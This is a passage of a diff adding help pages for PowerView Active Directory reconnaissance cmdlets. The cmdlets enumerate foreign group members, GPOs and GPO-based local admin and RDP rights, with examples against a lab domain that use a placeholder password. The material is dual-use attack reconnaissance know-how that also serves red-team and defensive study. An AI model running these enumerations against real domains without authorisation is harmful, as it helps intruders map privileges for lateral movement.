+Get-DomainFileServer -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DomainName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 8
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### String
+
+One or more strings representing file server names.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainForeignGroupMember.md b/docs/Recon/Get-DomainForeignGroupMember.md
new file mode 100755
index 0000000..9061774
--- /dev/null
+++ b/docs/Recon/Get-DomainForeignGroupMember.md
@@ -0,0 +1,238 @@
+# Get-DomainForeignGroupMember
+
+## SYNOPSIS
+Enumerates groups with users outside of the group's domain and returns
+each foreign member.
+This is a domain's "incoming" access.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainGroup
+
+## SYNTAX
+
+```
+Get-DomainForeignGroupMember [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-DomainGroup to enumerate all groups for the current (or target) domain,
+then enumerates the members of each group, and compares the member's domain
+name to the parent group's domain name, outputting the member if the domains differ.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainForeignGroupMember
+```
+
+Return all group members in the current domain where the group and member differ.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainForeignGroupMember -Domain dev.testlab.local
+```
+
+Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
+
+Return all group members in the dev.testlab.local domain where the member is
+not in dev.testlab.local.
+binding to the secondary.dev.testlab.local for
+queries, and using the specified alternate credentials.
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ForeignGroupMember
+
+Custom PSObject with translated group member property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainForeignUser.md b/docs/Recon/Get-DomainForeignUser.md
new file mode 100755
index 0000000..85b0092
--- /dev/null
+++ b/docs/Recon/Get-DomainForeignUser.md
@@ -0,0 +1,239 @@
+# Get-DomainForeignUser
+
+## SYNOPSIS
+Enumerates users who are in groups outside of the user's domain.
+This is a domain's "outgoing" access.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainUser
+
+## SYNTAX
+
+```
+Get-DomainForeignUser [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-DomainUser to enumerate all users for the current (or target) domain,
+then calculates the given user's domain name based on the user's distinguishedName.
+This domain name is compared to the queried domain, and the user object is
+output if they differ.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainForeignUser
+```
+
+Return all users in the current domain who are in groups not in the
+current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainForeignUser -Domain dev.testlab.local
+```
+
+Return all users in the dev.testlab.local domain who are in groups not in the
+dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
+
+Return all users in the dev.testlab.local domain who are in groups not in the
+dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and
+using the specified alternate credentials.
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ForeignUser
+
+Custom PSObject with translated user property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainGPO.md b/docs/Recon/Get-DomainGPO.md
new file mode 100755
index 0000000..9d0a468
--- /dev/null
+++ b/docs/Recon/Get-DomainGPO.md
@@ -0,0 +1,354 @@
+# Get-DomainGPO
+
+## SYNOPSIS
+Return all GPOs or specific GPO objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty
+
+## SYNTAX
+
+### None (Default)
+```
+Get-DomainGPO [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
+ [-Raw]
+```
+
+### ComputerIdentity
+```
+Get-DomainGPO [[-Identity] <String[]>] [-ComputerIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+### UserIdentity
+```
+Get-DomainGPO [[-Identity] <String[]>] [-UserIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all GPO objects for
+the current domain are returned.
+To enumerate all GPOs that are applied to
+a particular machine, use -ComputerName X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGPO -Domain testlab.local
+```
+
+Return all GPOs for the testlab.local domain
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGPO -ComputerName windows1.testlab.local
+```
+
+Returns all GPOs applied windows1.testlab.local
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO
+```
+
+Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display
+name of "Test GPO"
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
+```
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPO -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A display name (e.g.
+'Test GPO'), DistinguishedName (e.g.
+'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g.
+'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g.
+'{F260B76D-55C8-46C5-BEF1-9016DD98E272}').
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerIdentity
+Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).
+
+```yaml
+Type: String
+Parameter Sets: ComputerIdentity
+Aliases: ComputerName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).
+
+```yaml
+Type: String
+Parameter Sets: UserIdentity
+Aliases: UserName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GPO
+
+Custom PSObject with translated GPO property fields.
+
+PowerView.GPO.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md
new file mode 100755
index 0000000..4e5015b
--- /dev/null
+++ b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md
@@ -0,0 +1,263 @@
+# Get-DomainGPOComputerLocalGroupMapping
+
+## SYNOPSIS
+Takes a computer (or GPO) object and determines what users/groups are in the specified
+local group for the machine through GPO correlation.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup
+
+## SYNTAX
+
+### ComputerIdentity (Default)
+```
+Get-DomainGPOComputerLocalGroupMapping [-ComputerIdentity] <String> [-LocalGroup <String>] [-Domain <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+### OUIdentity
+```
+Get-DomainGPOComputerLocalGroupMapping -OUIdentity <String> [-LocalGroup <String>] [-Domain <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups
+are in the specified local group for a target machine through GPO correlation.
+
+If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to
+determine the OU the computer is a part of.
+Then resolve the computer's site name with
+Get-NetComputerSiteName and retrieve all sites object Get-DomainSite.
+For those results, attempt to
+enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup.
+For
+each resulting GPO group, resolve the resulting user/group name to a full AD object and
+return the results.
+This will return the domain objects that are members of the specified
+-LocalGroup for the given computer.
+
+Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and
+localgroup specifications.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local
+```
+
+Finds users who have local admin rights over WINDOWS3 through GPO correlation.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP
+```
+
+Finds users who have RDP rights over WINDOWS4 through GPO correlation.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local
+
+## PARAMETERS
+
+### -ComputerIdentity
+A SamAccountName (e.g.
+WINDOWS10$), DistinguishedName (e.g.
+CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g.
+4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g.
+windows10.testlab.local) for the computer to identity GPO local group mappings for.
+
+```yaml
+Type: String
+Parameter Sets: ComputerIdentity
+Aliases: ComputerName, Computer, DistinguishedName, SamAccountName, Name
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -OUIdentity
+An OU name (e.g.
+TestOU), DistinguishedName (e.g.
+OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g.
+8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for.
+
+```yaml
+Type: String
+Parameter Sets: OUIdentity
+Aliases: OU
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID.
+Defaults to local 'Administrators'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.GGPOComputerLocalGroupMember
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainGPOLocalGroup.md b/docs/Recon/Get-DomainGPOLocalGroup.md
new file mode 100755
index 0000000..e61fb82
--- /dev/null
+++ b/docs/Recon/Get-DomainGPOLocalGroup.md
@@ -0,0 +1,259 @@
+# Get-DomainGPOLocalGroup
+
+## SYNOPSIS
+Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups'
+or Group Policy preferences.
+Also return their user membership mappings, if they exist.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-DomainGPOLocalGroup [[-Identity] <String[]>] [-ResolveMembersToSIDs] [-Domain <String>]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed
+arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
+group membership is set through Group Policy Preferences groups.xml files.
+For any
+GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
+section data is processed if present.
+Any found Groups.xml files are parsed with
+Get-GroupsXML and those memberships are returned as well.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGPOLocalGroup
+```
+
+Returns all local groups set by GPO along with their members and memberof.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGPOLocalGroup -ResolveMembersToSIDs
+```
+
+Returns all local groups set by GPO along with their members and memberof,
+and resolve any members to their domain SIDs.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup
+```
+
+Return any GPO-set groups for the GPO with the given name/GUID.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainGPOLocalGroup 'Desktops'
+```
+
+Return any GPO-set groups for the GPO with the given display name.
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOLocalGroup -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A display name (e.g.
+'Test GPO'), DistinguishedName (e.g.
+'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g.
+'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g.
